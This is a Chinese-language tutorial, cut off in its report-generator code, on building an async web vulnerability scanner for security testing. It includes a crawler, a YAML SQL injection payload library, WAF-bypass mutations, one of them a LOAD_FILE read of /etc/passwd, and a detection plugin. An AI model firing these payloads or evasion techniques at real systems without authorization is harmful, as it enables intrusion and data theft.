前言:为什么要自建扫描器
市面上的商业扫描器(AWVS、AppScan、Nessus)功能强大但闭源昂贵,开源工具(Nikto、Wapiti、ZAP)灵活但不够定制化。在实际红蓝对抗和安全服务中,自建扫描器有三个不可替代的价值:
- 定制化Payload:针对特定CMS/中间件编写专用检测逻辑
- 可控并发模型:避免商业扫描器的高并发特征被WAF识别
- 结果可编程:漏洞数据直接入库,与自有平台联动
本文将从零开始,设计并实现一个模块化、可扩展的Web漏洞扫描器,覆盖爬虫引擎、Payload管理、并发调度、POC插件系统和报告输出等核心模块。
一、扫描器总体架构
1.1 架构设计
┌─────────────────────────────────────────────┐
│ CLI / API │
├─────────────────────────────────────────────┤
│ Scheduler (调度器) │
│ ┌─────────────────────────────┐ │
│ │ Task Queue (任务队列) │ │
│ └─────────────┬───────────────┘ │
├──────────────────┼───────────────────────────┤
│ ┌─────────────┴───────────────┐ │
│ │ Crawler Engine (爬虫) │ │
│ │ - URL发现 │ │
│ │ - 表单提取 │ │
│ │ - 参数识别 │ │
│ └─────────────┬───────────────┘ │
├──────────────────┼───────────────────────────┤
│ ┌─────────────┴───────────────┐ │
│ │ Scanner Core (扫描核心) │ │
│ │ - Payload Manager │ │
│ │ - Plugin Engine │ │
│ │ - Fingerprint Engine │ │
│ └─────────────┬───────────────┘ │
├──────────────────┼───────────────────────────┤
│ ┌─────────────┴───────────────┐ │
│ │ Concurrency (并发控制) │ │
│ │ - asyncio Event Loop │ │
│ │ - Rate Limiter │ │
│ │ - Proxy Pool │ │
│ └─────────────┬───────────────┘ │
├──────────────────┼───────────────────────────┤
│ ┌─────────────┴───────────────┐ │
│ │ Result Engine (结果引擎) │ │
│ │ - Report Generator │ │
│ │ - Database Writer │ │
│ │ - Webhook Notifier │ │
│ └─────────────────────────────┘ │
└─────────────────────────────────────────────┘
1.2 项目结构
web_scanner/
├── scanner/
│ ├── __init__.py
│ ├── core/
│ │ ├── engine.py # 扫描核心引擎
│ │ ├── scheduler.py # 任务调度器
│ │ └── config.py # 配置管理
│ ├── crawler/
│ │ ├── spider.py # 爬虫主逻辑
│ │ ├── form_extractor.py # 表单提取器
│ │ └── url_normalizer.py # URL标准化
│ ├── plugins/
│ │ ├── base.py # 插件基类
│ │ ├── sqli.py # SQL注入检测
│ │ ├── xss.py # XSS检测
│ │ ├── lfi.py # 文件包含检测
│ │ ├── ssrf.py # SSRF检测
│ │ └── command_injection.py
│ ├── payloads/
│ │ ├── manager.py # Payload管理器
│ │ ├── sqli_payloads.yaml
│ │ ├── xss_payloads.yaml
│ │ └── lfi_payloads.yaml
│ ├── concurrency/
│ │ ├── pool.py # 连接池/并发控制
│ │ └── ratelimiter.py # 速率限制器
│ ├── fingerprint/
│ │ └── wappalyzer.py # 指纹识别
│ └── report/
│ ├── generator.py # 报告生成
│ └── templates/ # 报告模板
├── tests/
├── config.yaml
└── requirements.txt
二、爬虫引擎实现
2.1 异步爬虫核心
"""scanner/crawler/spider.py - 异步爬虫引擎"""
import asyncio
import aiohttp
import logging
from urllib.parse import urljoin, urlparse
from bs4 import BeautifulSoup
from dataclasses import dataclass, field
from typing import Set, List, Optional
import re
logger = logging.getLogger(__name__)
@dataclass
class CrawlResult:
"""爬取结果"""
url: str
status_code: int
headers: dict
body: str
forms: List[dict] = field(default_factory=list)
links: List[str] = field(default_factory=list)
javascript_urls: List[str] = field(default_factory=list)
comments: List[str] = field(default_factory=list)
class AsyncSpider:
"""异步Web爬虫"""
def __init__(self, base_url: str, max_depth: int = 3,
max_pages: int = 500, concurrency: int = 10):
self.base_url = base_url
self.base_domain = urlparse(base_url).netloc
self.max_depth = max_depth
self.max_pages = max_pages
self.concurrency = concurrency
self.visited: Set[str] = set()
self.url_queue: asyncio.Queue = asyncio.Queue()
self.results: List[CrawlResult] = []
self.semaphore = asyncio.Semaphore(concurrency)
# URL黑名单(静态资源等)
self.blacklist_extensions = {
'.css', '.js', '.png', '.jpg', '.jpeg', '.gif', '.svg',
'.ico', '.woff', '.woff2', '.ttf', '.eot', '.mp4', '.mp3',
'.pdf', '.doc', '.docx', '.xls', '.xlsx', '.zip', '.tar', '.gz'
}
# 自定义请求头
self.headers = {
"User-Agent": "Mozilla/5.0 (compatible; SecurityScanner/1.0)",
"Accept": "text/html,application/xhtml+xml,*/*",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8",
}
def should_crawl(self, url: str) -> bool:
"""判断URL是否应该被爬取"""
parsed = urlparse(url)
# 同域检查
if parsed.netloc and parsed.netloc != self.base_domain:
return False
# 扩展名检查
ext = parsed.path.split('.')[-1].lower() if '.' in parsed.path else ''
if f'.{ext}' in self.blacklist_extensions:
return False
# 去重
normalized = self._normalize_url(url)
if normalized in self.visited:
return False
return True
def _normalize_url(self, url: str) -> str:
"""URL标准化(去掉fragment,统一 trailing slash 等)"""
parsed = urlparse(url)
normalized = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
if parsed.query:
# 按字母排序query参数
params = sorted(parsed.query.split('&'))
normalized += '?' + '&'.join(params)
return normalized
def extract_forms(self, soup: BeautifulSoup, url: str) -> List[dict]:
"""提取页面中的表单"""
forms = []
for form_tag in soup.find_all('form'):
form = {
'action': urljoin(url, form_tag.get('action', '')),
'method': form_tag.get('method', 'GET').upper(),
'inputs': [],
'selects': [],
'textareas': []
}
# 提取 input
for input_tag in form_tag.find_all('input'):
input_info = {
'name': input_tag.get('name', ''),
'type': input_tag.get('type', 'text'),
'value': input_tag.get('value', ''),
'placeholder': input_tag.get('placeholder', '')
}
form['inputs'].append(input_info)
# 提取 select
for select in form_tag.find_all('select'):
options = [opt.get('value', '') for opt in select.find_all('option')]
form['selects'].append({
'name': select.get('name', ''),
'options': options
})
# 提取 textarea
for textarea in form_tag.find_all('textarea'):
form['textareas'].append({
'name': textarea.get('name', ''),
'value': textarea.text
})
if form['action']:
forms.append(form)
return forms
def extract_links(self, soup: BeautifulSoup, url: str) -> List[str]:
"""提取页面中的链接"""
links = []
for a_tag in soup.find_all('a', href=True):
href = urljoin(url, a_tag['href'])
parsed = urlparse(href)
# 只保留http/https
if parsed.scheme in ('http', 'https'):
links.append(href)
return links
def extract_comments(self, html: str) -> List[str]:
"""提取HTML注释(可能包含敏感信息)"""
comments = re.findall(r'<!--(.*?)-->', html, re.DOTALL)
return [c.strip() for c in comments if len(c.strip()) > 3]
def extract_javascript(self, soup: BeautifulSoup, url: str) -> List[str]:
"""提取JS文件URL"""
scripts = []
for script in soup.find_all('script', src=True):
src = urljoin(url, script['src'])
scripts.append(src)
return scripts
async def fetch(self, session: aiohttp.ClientSession,
url: str, depth: int) -> Optional[CrawlResult]:
"""异步获取页面"""
try:
async with session.get(
url,
headers=self.headers,
timeout=aiohttp.ClientTimeout(total=15),
allow_redirects=True,
max_redirects=5
) as response:
if 'text/html' not in response.headers.get('Content-Type', ''):
return None
body = await response.text()
soup = BeautifulSoup(body, 'html.parser')
result = CrawlResult(
url=url,
status_code=response.status,
headers=dict(response.headers),
body=body,
forms=self.extract_forms(soup, url),
links=self.extract_links(soup, url),
javascript_urls=self.extract_javascript(soup, url),
comments=self.extract_comments(body)
)
# 将新发现的链接加入队列
for link in result.links:
if self.should_crawl(link):
await self.url_queue.put((link, depth + 1))
return result
except asyncio.TimeoutError:
logger.warning(f"Timeout: {url}")
except aiohttp.ClientError as e:
logger.warning(f"Request error for {url}: {e}")
except Exception as e:
logger.error(f"Unexpected error for {url}: {e}")
return None
async def worker(self, session: aiohttp.ClientSession):
"""工作协程"""
while len(self.visited) < self.max_pages:
try:
url, depth = await asyncio.wait_for(
self.url_queue.get(), timeout=5
)
except asyncio.TimeoutError:
break
normalized = self._normalize_url(url)
if normalized in self.visited or depth > self.max_depth:
self.url_queue.task_done()
continue
self.visited.add(normalized)
async with self.semaphore:
result = await self.fetch(session, url, depth)
if result:
self.results.append(result)
logger.info(
f"[Crawled] depth={depth} "
f"forms={len(result.forms)} "
f"links={len(result.links)} "
f"-> {url}"
)
self.url_queue.task_done()
async def crawl(self) -> List[CrawlResult]:
"""主爬取流程"""
# 初始化队列
await self.url_queue.put((self.base_url, 0))
connector = aiohttp.TCPConnector(
limit=self.concurrency * 2,
limit_per_host=self.concurrency,
force_close=True
)
async with aiohttp.ClientSession(connector=connector) as session:
workers = [
asyncio.create_task(self.worker(session))
for _ in range(self.concurrency)
]
# 等待队列清空或达到最大页数
while len(self.visited) < self.max_pages:
await asyncio.sleep(0.5)
if self.url_queue.empty():
# 再等待一会确保没有新链接加入
await asyncio.sleep(3)
if self.url_queue.empty():
break
# 取消剩余worker
for w in workers:
w.cancel()
await asyncio.gather(*workers, return_exceptions=True)
logger.info(f"Crawl finished. Visited {len(self.visited)} pages, "
f"collected {len(self.results)} results.")
return self.results
# 使用示例
async def main():
spider = AsyncSpider(
base_url="http://testphp.vulnweb.com",
max_depth=3,
max_pages=100,
concurrency=10
)
results = await spider.crawl()
# 统计
total_forms = sum(len(r.forms) for r in results)
total_links = sum(len(r.links) for r in results)
print(f"\n=== Crawl Statistics ===")
print(f"Pages crawled: {len(results)}")
print(f"Forms found: {total_forms}")
print(f"Links found: {total_links}")
print(f"Comments found: {sum(len(r.comments) for r in results)}")
if __name__ == "__main__":
asyncio.run(main())
三、Payload管理系统
3.1 YAML格式Payload库
# scanner/payloads/sqli_payloads.yaml
sql_injection:
# 基础探测
detection:
- payload: "'"
expected: ["error", "syntax", "mysql", "SQL", "ODBC", "Warning"]
type: error_based
description: "单引号报错探测"
- payload: "\""
expected: ["error", "syntax", "psql", "unterminated"]
type: error_based
description: "双引号报错探测"
- payload: "' AND '1'='1"
expected: ["normal"]
type: boolean_based
description: "布尔真值测试"
- payload: "' AND '1'='2"
expected: ["different"]
type: boolean_based
description: "布尔假值测试"
- payload: "'; WAITFOR DELAY '0:0:5'--"
type: time_based
threshold_ms: 4000
description: "MSSQL时间盲注"
# Union注入
union:
- payload: "' UNION SELECT NULL--"
description: "Union列数探测1"
- payload: "' UNION SELECT NULL,NULL--"
description: "Union列数探测2"
- payload: "' UNION SELECT NULL,NULL,NULL,NULL,NULL--"
description: "Union列数探测5"
- payload: "' UNION SELECT @@version,NULL--"
dbms: mysql
description: "MySQL版本获取"
# 数据库指纹
fingerprint:
- payload: "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- "
dbms: mysql
description: "MySQL SLEEP指纹"
- payload: "'; SELECT pg_sleep(5)--"
dbms: postgresql
description: "PostgreSQL SLEEP指纹"
- payload: "'; WAITFOR DELAY '0:0:5'--"
dbms: mssql
description: "MSSQL WAITFOR指纹"
- payload: "' AND 1234=DBMS_PIPE.RECEIVE_MESSAGE('RDS',5)--"
dbms: oracle
description: "Oracle DBMS_PIPE指纹"
# 绕过WAF
bypass:
- payload: "/**/OR/**/1=1"
type: comment_bypass
description: "注释绕过空格过滤"
- payload: "SeLeCt * FrOm users"
type: case_bypass
description: "大小写绕过"
- payload: "1' AND IF(1=1,(SELECT+LOAD_FILE(0x2f6574632f706173737764)),0)#"
type: hex_bypass
description: "十六进制编码绕过"
3.2 Payload管理器实现
"""scanner/payloads/manager.py"""
import yaml
import random
from pathlib import Path
from typing import List, Dict, Any, Optional
from dataclasses import dataclass
@dataclass
class Payload:
"""单个Payload"""
content: str
type: str
description: str
dbms: Optional[str] = None
expected: Optional[List[str]] = None
threshold_ms: Optional[int] = None
metadata: Dict[str, Any] = None
class PayloadManager:
"""Payload管理器 - 负责加载、选择、管理Payload"""
def __init__(self, payload_dir: str = "payloads/"):
self.payload_dir = Path(payload_dir)
self.payloads: Dict[str, List[Payload]] = {}
self._load_all()
def _load_all(self):
"""加载所有YAML payload文件"""
if not self.payload_dir.exists():
return
for yaml_file in self.payload_dir.glob("*.yaml"):
try:
with open(yaml_file, 'r', encoding='utf-8') as f:
data = yaml.safe_load(f)
category = yaml_file.stem.replace('_payloads', '')
self.payloads[category] = []
for vuln_type, payloads in (data.get(category, {}) or {}).items():
if isinstance(payloads, list):
# 直接列表
for p in payloads:
self._add_payload(category, vuln_type, p)
elif isinstance(payloads, dict):
# 子分类
for sub_type, sub_payloads in payloads.items():
if isinstance(sub_payloads, list):
for p in sub_payloads:
self._add_payload(category, sub_type, p)
except Exception as e:
print(f"Error loading {yaml_file}: {e}")
def _add_payload(self, category: str, vuln_type: str, data: dict):
"""将YAML数据转为Payload对象"""
payload = Payload(
content=data.get('payload', ''),
type=data.get('type', vuln_type),
description=data.get('description', ''),
dbms=data.get('dbms'),
expected=data.get('expected'),
threshold_ms=data.get('threshold_ms'),
metadata=data
)
self.payloads.setdefault(category, []).append(payload)
def get_by_category(self, category: str) -> List[Payload]:
"""按类别获取payload"""
return self.payloads.get(category, [])
def get_by_type(self, category: str, payload_type: str) -> List[Payload]:
"""按类型获取payload"""
return [p for p in self.get_by_category(category)
if p.type == payload_type]
def get_by_dbms(self, category: str, dbms: str) -> List[Payload]:
"""按数据库类型获取payload"""
return [p for p in self.get_by_category(category)
if p.dbms and p.dbms.lower() == dbms.lower()]
def get_random(self, category: str, count: int = 5) -> List[Payload]:
"""随机选取payload(用于模糊测试)"""
available = self.get_by_category(category)
return random.sample(available, min(count, len(available)))
def generate_mutation(self, payload: Payload,
mutations: List[str] = None) -> List[Payload]:
"""对payload进行变异(绕过WAF)"""
if mutations is None:
mutations = ["case", "comment", "urlencode", "double_urlencode", "hex"]
mutated = []
content = payload.content
mutation_map = {
"case": lambda s: ''.join(
c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(s)
),
"comment": lambda s: s.replace(' ', '/**/'),
"double_quote": lambda s: s.replace("'", '"'),
"tabs": lambda s: s.replace(' ', '\t'),
}
for mutation_name in mutations:
if mutation_name in mutation_map:
new_content = mutation_map[mutation_name](content)
new_payload = Payload(
content=new_content,
type=payload.type,
description=f"{payload.description} [{mutation_name} bypass]",
dbms=payload.dbms,
expected=payload.expected,
threshold_ms=payload.threshold_ms,
metadata={"mutation": mutation_name, "original": content}
)
mutated.append(new_payload)
return mutated
def summary(self) -> str:
"""输出Payload库摘要"""
lines = ["=== Payload Library Summary ==="]
total = 0
for category, payloads in self.payloads.items():
types = set(p.type for p in payloads)
lines.append(f" [{category}] {len(payloads)} payloads, types: {types}")
total += len(payloads)
lines.append(f" Total: {total} payloads")
return '\n'.join(lines)
# 使用示例
if __name__ == "__main__":
pm = PayloadManager("payloads/")
print(pm.summary())
# 获取SQLi检测payload
sqli_payloads = pm.get_by_type("sql_injection", "error_based")
print(f"\n[*] Error-based SQLi payloads: {len(sqli_payloads)}")
for p in sqli_payloads[:5]:
print(f" {p.content} - {p.description}")
# 变异payload
original = sqli_payloads[0]
mutated = pm.generate_mutation(original)
print(f"\n[*] Mutated payloads:")
for p in mutated:
print(f" {p.content} - {p.description}")
四、插件系统设计
4.1 插件基类
"""scanner/plugins/base.py - 插件基类"""
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from typing import List, Dict, Any, Optional
from enum import Enum
import time
class Severity(Enum):
INFO = "info"
LOW = "low"
MEDIUM = "medium"
HIGH = "high"
CRITICAL = "critical"
@dataclass
class Vulnerability:
"""漏洞信息"""
name: str
description: str
severity: Severity
url: str
parameter: str
payload: str
evidence: str
cvss_score: Optional[float] = None
cwe_id: Optional[str] = None
remediation: Optional[str] = None
raw_request: Optional[str] = None
raw_response: Optional[str] = None
timestamp: float = field(default_factory=time.time)
@dataclass
class ScanTarget:
"""扫描目标"""
url: str
method: str = "GET"
params: Dict[str, str] = field(default_factory=dict)
headers: Dict[str, str] = field(default_factory=dict)
cookies: Dict[str, str] = field(default_factory=dict)
body: Optional[str] = None
content_type: str = "application/x-www-form-urlencoded"
class BasePlugin(ABC):
"""扫描插件基类"""
# 插件元信息
name: str = "base"
description: str = "Base plugin"
version: str = "1.0.0"
author: str = "security-team"
# 风险等级
severity: Severity = Severity.MEDIUM
# 是否启用
enabled: bool = True
def __init__(self, config: Dict[str, Any] = None):
self.config = config or {}
self.findings: List[Vulnerability] = []
self._init_config()
def _init_config(self):
"""初始化插件配置"""
self.enabled = self.config.get('enabled', True)
self.timeout = self.config.get('timeout', 10)
self.retries = self.config.get('retries', 2)
@abstractmethod
async def scan(self, target: ScanTarget, session) -> List[Vulnerability]:
"""扫描方法 - 子类必须实现"""
pass
def add_finding(self, vuln: Vulnerability):
"""添加漏洞发现"""
self.findings.append(vuln)
def clear_findings(self):
"""清空发现"""
self.findings.clear()
def get_info(self) -> Dict[str, Any]:
"""获取插件信息"""
return {
"name": self.name,
"description": self.description,
"version": self.version,
"severity": self.severity.value,
"enabled": self.enabled
}
4.2 SQL注入检测插件
"""scanner/plugins/sqli.py - SQL注入检测插件"""
import asyncio
import aiohttp
import re
import time
from typing import List
from .base import BasePlugin, ScanTarget, Vulnerability, Severity
class SQLiPlugin(BasePlugin):
"""SQL注入检测插件"""
name = "sql_injection"
description = "Detect SQL Injection vulnerabilities"
version = "2.0.0"
severity = Severity.CRITICAL
# 错误特征
ERROR_PATTERNS = [
(re.compile(r"SQL syntax.*MySQL", re.I), "MySQL"),
(re.compile(r"Warning.*mysql_", re.I), "MySQL"),
(re.compile(r"PostgreSQL.*ERROR", re.I), "PostgreSQL"),
(re.compile(r"Driver.*SQL[\-\s]*Server", re.I), "MSSQL"),
(re.compile(r"Oracle.*Driver", re.I), "Oracle"),
(re.compile(r"SQLite.*Error", re.I), "SQLite"),
(re.compile(r"ODBC.*Driver", re.I), "ODBC"),
(re.compile(r"SQLSTATE\[\d+\]", re.I), "PDO"),
(re.compile(r"Unclosed quotation mark", re.I), "MSSQL"),
(re.compile(r"quoted string not properly terminated", re.I), "Oracle"),
]
def __init__(self, config=None):
super().__init__(config)
# 检测Payloads
self.detection_payloads = [
# 错误检测
{"payload": "'", "type": "error"},
{"payload": "\"", "type": "error"},
{"payload": "'\"", "type": "error"},
{"payload": "')", "type": "error"},
# 布尔检测
{"payload": "' AND '1'='1", "type": "boolean"},
{"payload": "' AND '1'='2", "type": "boolean"},
{"payload": "' OR '1'='1", "type": "boolean"},
# 时间检测
{"payload": "'; WAITFOR DELAY '0:0:5'--", "type": "time", "dbms": "MSSQL"},
{"payload": "' OR SLEEP(5)#", "type": "time", "dbms": "MySQL"},
{"payload": "' OR pg_sleep(5)--", "type": "time", "dbms": "PostgreSQL"},
# 算术检测
{"payload": "' AND 1=1--", "type": "boolean"},
{"payload": "' AND 1=2--", "type": "boolean"},
# Union探测
{"payload": "' UNION SELECT NULL--", "type": "union"},
{"payload": "') UNION SELECT NULL--", "type": "union"},
]
self.time_threshold = 4.0 # 时间盲注阈值(秒)
def detect_dbms(self, response_text: str) -> str:
"""通过响应识别数据库类型"""
for pattern, dbms in self.ERROR_PATTERNS:
if pattern.search(response_text):
return dbms
return "Unknown"
async def send_payload(self, target: ScanTarget, payload: str,
param_name: str, session) -> tuple:
"""发送带有payload的请求"""
new_params = target.params.copy()
new_params[param_name] = payload
start_time = time.time()
try:
if target.method == "GET":
async with session.get(
target.url,
params=new_params,
headers=target.headers,
cookies=target.cookies,
timeout=aiohttp.ClientTimeout(total=self.timeout)
) as resp:
response_text = await resp.text()
elapsed = time.time() - start_time
return resp.status, response_text, elapsed
else:
async with session.post(
target.url,
data=new_params,
headers=target.headers,
cookies=target.cookies,
timeout=aiohttp.ClientTimeout(total=self.timeout)
) as resp:
response_text = await resp.text()
elapsed = time.time() - start_time
return resp.status, response_text, elapsed
except Exception as e:
return 0, str(e), time.time() - start_time
async def test_error_based(self, target: ScanTarget, param: str,
session) -> List[Vulnerability]:
"""错误注入检测"""
findings = []
# 获取正常响应作为基准
_, normal_response, _ = await self.send_payload(
target, target.params.get(param, ''), param, session
)
normal_length = len(normal_response)
error_payloads = [p for p in self.detection_payloads if p['type'] == 'error']
for p in error_payloads:
status, response, elapsed = await self.send_payload(
target, p['payload'], param, session
)
dbms = self.detect_dbms(response)
if dbms != "Unknown" or (status == 500 and len(response) != normal_length):
findings.append(Vulnerability(
name="SQL Injection (Error-based)",
description=f"Error-based SQL injection detected in parameter '{param}'",
severity=Severity.CRITICAL,
url=target.url,
parameter=param,
payload=p['payload'],
evidence=f"DBMS identified: {dbms}\nStatus: {status}\n"
f"Response length: {len(response)} (normal: {normal_length})",
cvss_score=9.8,
cwe_id="CWE-89",
remediation="Use parameterized queries / prepared statements"
))
break # 找到一个即可
return findings
async def test_boolean_based(self, target: ScanTarget, param: str,
session) -> List[Vulnerability]:
"""布尔盲注检测"""
findings = []
# 发送真值payload
true_payloads = ["' AND '1'='1", "' OR '1'='1", "' AND 1=1--"]
false_payloads = ["' AND '1'='2", "' AND 1=2--", "' OR '1'='2"]
for true_p, false_p in zip(true_payloads, false_payloads):
_, true_resp, _ = await self.send_payload(target, true_p, param, session)
_, false_resp, _ = await self.send_payload(target, false_p, param, session)
true_len = len(true_resp)
false_len = len(false_resp)
# 如果真值和假值响应长度差异超过20%,判定为布尔盲注
if abs(true_len - false_len) / max(true_len, 1) > 0.2:
findings.append(Vulnerability(
name="SQL Injection (Boolean-based Blind)",
description=f"Boolean-based blind SQL injection in parameter '{param}'",
severity=Severity.HIGH,
url=target.url,
parameter=param,
payload=f"TRUE: {true_p} | FALSE: {false_p}",
evidence=f"TRUE response: {true_len} bytes\n"
f"FALSE response: {false_len} bytes\n"
f"Difference: {abs(true_len - false_len)} bytes",
cvss_score=7.5,
cwe_id="CWE-89",
remediation="Use parameterized queries"
))
break
return findings
async def test_time_based(self, target: ScanTarget, param: str,
session) -> List[Vulnerability]:
"""时间盲注检测"""
findings = []
# 先测试正常请求的响应时间
_, _, baseline_time = await self.send_payload(
target, target.params.get(param, ''), param, session
)
time_payloads = [p for p in self.detection_payloads if p['type'] == 'time']
for p in time_payloads:
_, _, elapsed = await self.send_payload(target, p['payload'], param, session)
# 如果响应时间超过阈值(相对于基准时间)
if elapsed > max(self.time_threshold, baseline_time * 3):
findings.append(Vulnerability(
name="SQL Injection (Time-based Blind)",
description=f"Time-based blind SQL injection ({p.get('dbms', '')}) "
f"in parameter '{param}'",
severity=Severity.HIGH,
url=target.url,
parameter=param,
payload=p['payload'],
evidence=f"Response time: {elapsed:.2f}s "
f"(baseline: {baseline_time:.2f}s)",
cvss_score=7.5,
cwe_id="CWE-89",
remediation="Use parameterized queries"
))
break
return findings
async def scan(self, target: ScanTarget, session) -> List[Vulnerability]:
"""执行SQL注入扫描"""
self.clear_findings()
if not target.params:
return []
# 并发检测所有参数
tasks = []
for param_name in target.params:
tasks.append(self.test_error_based(target, param_name, session))
tasks.append(self.test_boolean_based(target, param_name, session))
tasks.append(self.test_time_based(target, param_name, session))
results = await asyncio.gather(*tasks)
for result_list in results:
for finding in result_list:
self.add_finding(finding)
return self.findings
五、并发调度引擎
5.1 速率限制与连接池
"""scanner/concurrency/pool.py - 并发控制"""
import asyncio
import time
from typing import Dict, List
from dataclasses import dataclass, field
@dataclass
class HostStats:
"""主机请求统计"""
request_count: int = 0
last_request_time: float = 0.0
error_count: int = 0
consecutive_errors: int = 0
class RateLimiter:
"""速率限制器"""
def __init__(self, requests_per_second: float = 10.0,
burst: int = 20):
self.rate = requests_per_second
self.burst = burst
self.tokens = float(burst)
self.max_tokens = float(burst)
self.last_update = time.monotonic()
self.lock = asyncio.Lock()
async def acquire(self) -> bool:
"""获取令牌"""
async with self.lock:
now = time.monotonic()
elapsed = now - self.last_update
# 令牌桶算法:按速率补充令牌
self.tokens = min(self.max_tokens,
self.tokens + elapsed * self.rate)
self.last_update = now
if self.tokens >= 1.0:
self.tokens -= 1.0
return True
else:
# 计算需要等待的时间
wait_time = (1.0 - self.tokens) / self.rate
return False # 不等待,直接拒绝
class AdaptiveHostManager:
"""自适应主机管理器 — 根据目标响应调整请求速率"""
def __init__(self, default_rate: float = 10.0, max_concurrent: int = 10):
self.default_rate = default_rate
self.max_concurrent = max_concurrent
self.hosts: Dict[str, HostStats] = {}
self.limiters: Dict[str, RateLimiter] = {}
self.semaphores: Dict[str, asyncio.Semaphore] = {}
def get_limiter(self, host: str) -> RateLimiter:
"""获取主机的速率限制器"""
if host not in self.limiters:
self.limiters[host] = RateLimiter(self.default_rate)
self.semaphores[host] = asyncio.Semaphore(self.max_concurrent)
return self.limiters[host]
def get_semaphore(self, host: str) -> asyncio.Semaphore:
"""获取主机的并发信号量"""
if host not in self.semaphores:
self.semaphores[host] = asyncio.Semaphore(self.max_concurrent)
return self.semaphores[host]
def record_response(self, host: str, error: bool = False,
response_time: float = 0.0):
"""记录响应以自适应调整"""
if host not in self.hosts:
self.hosts[host] = HostStats()
stats = self.hosts[host]
stats.request_count += 1
if error:
stats.error_count += 1
stats.consecutive_errors += 1
# 连续错误时降低速率
limiter = self.get_limiter(host)
limiter.rate = max(1.0, limiter.rate * 0.8)
else:
stats.consecutive_errors = 0
# 正常响应时逐步恢复速率
limiter = self.get_limiter(host)
limiter.rate = min(self.default_rate, limiter.rate * 1.05)
class ConcurrentScanner:
"""并发扫描器"""
def __init__(self, rate: float = 10.0, max_concurrent: int = 15,
host_manager: AdaptiveHostManager = None):
self.host_manager = host_manager or AdaptiveHostManager(rate, max_concurrent)
self.total_requests = 0
self.total_errors = 0
async def scan_with_control(self, coro, host: str):
"""在并发控制下执行扫描"""
semaphore = self.host_manager.get_semaphore(host)
async with semaphore:
start = time.time()
try:
result = await coro
elapsed = time.time() - start
self.host_manager.record_response(host, error=False,
response_time=elapsed)
self.total_requests += 1
return result
except Exception as e:
self.host_manager.record_response(host, error=True)
self.total_errors += 1
raise e
async def scan_targets(self, targets: List, scan_func):
"""扫描多个目标"""
tasks = []
for target in targets:
host = target.url.split('/')[2] # 提取host部分
task = self.scan_with_control(scan_func(target), host)
tasks.append(task)
results = await asyncio.gather(*tasks, return_exceptions=True)
return results
def stats(self) -> str:
"""输出统计信息"""
return (
f"Requests: {self.total_requests} | "
f"Errors: {self.total_errors} | "
f"Hosts: {len(self.host_manager.hosts)}"
)
# 使用示例
async def scanner_main():
from urllib.parse import urlparse
scanner = ConcurrentScanner(rate=5.0, max_concurrent=10)
async def scan_single(url):
# 模拟扫描
await asyncio.sleep(1)
return {"url": url, "status": "clean"}
targets = [f"http://example{i}.com" for i in range(50)]
# 并发执行但有速率控制
results = await scanner.scan_targets(targets, scan_single)
print(scanner.stats())
if __name__ == "__main__":
asyncio.run(scanner_main())
六、报告生成
"""scanner/report/generator.py"""
import json
import html
from datetime import datetime
from typing import List
from pathlib import Path
from scanner.plugins.base import Vulnerability
class ReportGenerator:
"""扫描报告生成器"""
HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>Web漏洞扫描报告</title>
<style>
body { font-family: -apple-system, sans-serif; margin: 40px; color: #333; }
h1 { color: #1a1a1a; border-bottom: 3px solid #e74c3c; padding-bottom: 10px; }
h2 { color: #2c3e50; margin-top: 30px; }
.summary { display: flex; gap: 20px; margin: 20px 0; }
.stat { padding: 15px 25px; border-radius: 8px; color: white; font-size: 24px;
font-weight: bold; }
.stat.critical { background: #e74c3c; }
.stat.high { background: #e67e22; }
.stat.medium { background: #f39c12; }
.stat.low { background: #3498db; }
.stat.info { background: #95a5a6; }
.finding { border: 1px solid #ddd; border-radius: 6px; padding: 15px;
margin: 15px 0; border-left: 4px solid #e74c3c; }
.finding .severity { display: inline-block; padding: 3px 10px;
border-radius: 3px; color: white; font-size: 12px;
font-weight: bold; }
pre { background: #2d2d2d; color: #f8f8f2; padding: 15px;
border-radius: 6px; overflow-x: auto; }
code { font-family: 'Fira Code', monospace; }
</style>
</head>
<body>
<h1>🔍 Web漏洞扫描报告</h1>
<p><strong>扫描时间:</strong>{scan_time}</p>
<p><strong>目标URL:</strong>{target_url}</p>
<h2>统计概览</h2>
<div class="summary">
{summary_cards}
</div>
<h2>漏洞详情</h2>
{findings_html}
<footer style="margin-top: 50px; color: #999; font-size: 12px;">
Generated by Security Scanner v1.0 - {gen_time}
</footer>
</body>
</html>
"""
def __init__(self, target_url: str):
self.target_url = target_url
self.findings: List[Vulnerability] = []
def add_finding(self, vuln: Vulnerability):
self.findings.append(vuln)
def add_findings(self, vulns: List[Vulnerability]):
self.findings.extend(vulns)
def generate_html(self, output_path: str):
"""生成HTML报告"""
# 统计
severity_count = {}
for v in self.findings:
sev = v.severity.value
severity_count[sev] = severity_count.get(sev, 0) + 1
# 生成摘要卡片
colors = {"critical": "critical", "high": "high",
"medium": "medium", "low": "low", "info": "info"}
cards = []
for sev, cls in colors.items():
count = severity_count.get(sev, 0)
cards.append(
f'<div class="stat {cls}">{sev.upper()}<br><small>{count}</small></div>'
)
# 生成漏洞详情
findings_html_parts = []
for i, v in enumerate(self.findings, 1):
finding_html = f"""
<div class="finding">
<h3>[{i}] {html.escape(v.name)}
<span class="severity" style="background: {
'#e74c3c' if v.severity.value == 'critical' else
'#e67e22' if v.severity.value == 'high' else
'#f39c12' if v.severity.value == 'medium' else
'#3498db' if v.severity.value == 'low' else '#95a5a6'
}">{v.severity.value.upper()}</span>
</h3>
<p><strong>URL: </strong>{html.escape(v.url)}</p>
<p><strong>Parameter: </strong>{html.escape(v.parameter)}</p>
<p><strong>Payload: </strong><code>{html.escape(v.payload)}</code></p>
<p><strong>CWE: </strong>{v.cwe_id or 'N/A'}</p>
<p><strong>Description: </strong>{html.escape(v.description)}</p>
<p><strong>Evidence: </strong></p>
<pre>{html.escape(v.evidence)}</pre>
<p><strong>Remediation: </strong>{html.escape(v.remediation or 'N/A')}</p>
</div>
"""
findings_html_parts.append(finding_html)
# 组装HTML
html_content = self.HTML_TEMPLATE.format(
scan_time=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
target_url=html.escape(self.target_url),
summary_cards='\n'.join(cards),
